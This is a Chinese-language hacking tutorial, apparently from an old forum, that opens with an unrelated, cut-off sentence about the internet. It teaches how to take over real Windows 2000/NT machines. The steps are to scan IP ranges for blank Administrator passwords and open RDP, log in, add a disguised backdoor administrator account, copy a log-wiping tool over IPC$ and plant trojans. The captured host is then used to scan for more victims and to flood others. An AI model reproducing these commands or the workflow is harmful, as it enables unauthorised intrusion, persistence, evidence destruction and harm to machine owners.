Erit

在当今世界上，电脑信息网络使人们得以在国内各地乃至全球范围内交换各种各样的信息，正所谓“足不出户能知天下事”。在目前全球性电脑信息网络中，最为成功和覆盖面最大、信息资源最丰富的当属 

现在有输入法漏洞的机器已不多了，除非你遇见的是一个极不负责任的网管，呵呵！~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器，使它成为你的肉鸡。（下面的人要注意啊，不要搞国内的机器，我用来做示范的是台湾的机器，为何要用台湾的呢？等一下就知道啦）先做一下准备活动，呵呵！何为准备活动？就是找到要用的工具呀。（操作系统要求win2000/NT)　 

一.X-scan-v1.0,强大的扫描工具，简单易用，没有IP限制，呵呵？想到什么了？　 

二.WIN2000终端服务客户端（没这个怎么叫3389肉鸡呢？）　 

三.CleanIISLog.exe,榕哥的清日志的好东东！^o^(又买广告呢）　 

四.SQLEXEC.EXE　 

好！武器都准备好了就动手吧！　 

一。运行X-scan-v1.0工具包中的xscan_gui.exe，这是一个图形界面的扫描器，在“扫描设置”下选择“标准端口”；“NT弱口令用户”；“SQL-SERVER默认帐户”这三项，“运行参数”下填上你要扫描的IP地址段，例如：211.**.1.1-211.**.20.255（选的范围不要太大，要不很长时间都扫不完，也不要太少，少了可能找不到肉鸡），尽量不要选下面的“使用代理服务器”，线程要看你的网速如何，快的可以填50线程，我一般是用50的！YEAH！~~在“扫描前先PING主机”打上钩，“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下，“配置文件”处是.\dat\config.ini，点击旁边的“读取设置”，看到这个面板的框框都有东西了，就表示设置好！回到开始时的“扫描设置”面板下，点击下方的“开始扫描”。见到一个DOS窗口出来了，扫描正式开始！^O^,去泡泡MM吧，天南地北的吹一通，呵呵，看到扫描全部完成了，和你的MM说拜拜咯，开工~！！　 

看看扫描的报告，可能会很多的，一定要看清楚哦，要不肉鸡可能就这样给飞走啦。找找看，（主要是找有NT弱口令帐户又同时开了3389的机器）我就找到了一个例子：（不是真的哦，别照这个去试）　 

211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】　 

NT弱口令帐户:1 开放端口:135,139,3389　 

看到了吗？NT弱口令帐户:1 开放端口:135,139,3389，！！！！！！！！！！　 

好了，再点“详细资料”进去看看：　 

【NT弱口令用户】:　 

Administrator: [空口令]　 

帐户类型：管理员(Administrator)　 

最后登录时间: GMT　 

错误口令次数: 0次　 

成功登录次数: 9次　 

用户ID: 0x000001f4, 组ID: 0x00000201　 

欢呼吧，！！！！！！！（如果看到“详细资料”里的帐户类型不是管理员的话，就找下一个吧，反正扫描报告多得很，总会找到一个的，我就试过扫描一次，就扫到了十多个这样的帐户，呵呵！~~）　 

知道了管理员的帐户是：Administrator，口令是空！到这时候，这台NT主机已差不多可以说是你的啦。　 

二.运行你的终端服务客户端，填上这个IP，按“连接”，等一下就看到了熟悉的WIN2000终端登陆界面，好，填上用户名：Administrator，口令不用填啦，按“确定”，等一下，哈哈！！！！！进去啦~~~~你会先看到一个叫你设定伺服器的画面，关掉，不要了。想干什么？首先我们为了防止管理员以后改了密码，我们先要给自己做一个管理员的帐户，点对方屏幕的开始--》程序--》附件--》命令提示符（这里的字有时是不同的，要看具体是什么系统，自己好好看看吧），依次输入：　 

C:\>net user owem lgg1234 /add（加入一个用户名为owem,密码：lgg1314的帐户）　 

指令執行成功。　 

C：\>net localgroup administrators owem /add(把owem加入到管理员组）　 

指令執行成功。　 

好了！到这里你已增加了一个管理员了，以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦，建议你先用net user看看人家的管理组有多少人，人多的话就尽管加个号吧，人少的加号时就要找一个近似于对方的名字来迷惑管理员，哈哈~`够绝了吧！　 

再来，在自己的命令提示符下依次输入：　 

D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去）　 

命令成功完成。　 

D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下，有时会拒绝访问的，就拷到其他目录下吧）　 

已复制 1 个文件。　 

你也可以把木马拷上去，哈哈！~~~有意思！！5555555555.....　 

再来删除IPC的连接　 

D:\hacker>net use \\211.**.**.53\ipc$ /delete　 

\\211.**.**.53\ipc$ 已经删除。　 

先去看看管理员在不在，开始--》程序--》系统管理工具--》终端服务管理员，哈哈！`~没在！爽极啦，只有你一个连线！　 

下面该玩点什么呢？打开他的浏览器，去你知道的黑软地址下载你想用的工具，什么？装个流光？哈哈！~~`目标太大了吧？还是下个X-SCAN算了，下个IP炸弹？？呵呵！好主意，`炸你的情敌去吧！用他下载的X-SCAN帮你去找更多的肉鸡！1YEAH！如果你在上面运行了程序，你退出时就只关终端窗口右上角的X就行了，关掉后你的程序还在运行呢！明天睡醒了来收你的战果吧！如果你要全部退出，就按开始--》关机--》登出****（你的帐户）。　 

还要补充的就是如果你扫到的是：SQL-SERVER默认帐户，没有NT管理员弱口令，但3389还是开了的话，就可以用SQLEXEC。EXE来连接上去，建立帐户也是用一样的命令，你也可以用3389登陆上去啦